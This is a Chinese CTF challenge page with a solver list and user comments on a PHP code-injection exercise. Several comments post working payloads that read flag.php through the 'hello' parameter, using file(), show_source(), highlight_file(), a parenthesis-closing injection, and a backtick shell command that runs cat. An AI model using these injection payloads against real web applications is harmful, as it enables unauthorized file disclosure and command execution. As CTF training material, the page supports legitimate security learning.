评分(10)
解题动态
徐日123 攻破了该题 57分钟前
九久 攻破了该题 1小时前
jwz 攻破了该题 3小时前
胡look 攻破了该题 4小时前
MAO 攻破了该题 17小时前
eee5588 攻破了该题 20小时前
zzasas 攻破了该题 21小时前
安藏七月 攻破了该题 23小时前
大宋iu后的 攻破了该题 23小时前
Rx 攻破了该题 1天前
浪鸭 攻破了该题 1天前
千万 攻破了该题 1天前
13246563665 攻破了该题 1天前
18369735915 攻破了该题 1天前
popidojdow 攻破了该题 1天前
GDGZ_CTF 攻破了该题 1天前
纳百川. 攻破了该题 1天前
link7788 攻破了该题 2天前
langzifun 攻破了该题 2天前
评论
luoyao 4年前
举报
?hello=file("flag.php")
luyisie 4年前
举报
file // show_source // highlight_file
wwgy9981 4年前
举报
flag = 'Too Young Too Simple‘
kavin 4年前
举报
明白了原理,用bp搞了一轮,发现hello=show_source('flag.php')可行
kuaiting 4年前
举报
使用?hello=file('flag.php') 或者?hello=show_source('flag.php') 等可以读取源码的函数 或者构造var_dump($a) 闭合
陈江川0118 4年前
举报
简单来说就是利用file函数把flag.php的内容存到一个数组中,然后打印出来数组的内容即可
trackboy 4年前
举报
?hello=file(%22flag.php%22) ?hello=file_get_contents(%27flag.php%27) ?hello=1);show_source(%27flag.php%27);var_dump( ?hello=);echo%20`cat%20./flag.php`;//
lgb236277484 4年前
举报
highlight_file()
mingshen 4年前
举报
PHP show_source() 杂项函数,或者file协议读取文件内容
linkzoom 4年前
举报
离谱,cat啥啊真的是...
ctf20210817 4年前
举报
确实是cat就可以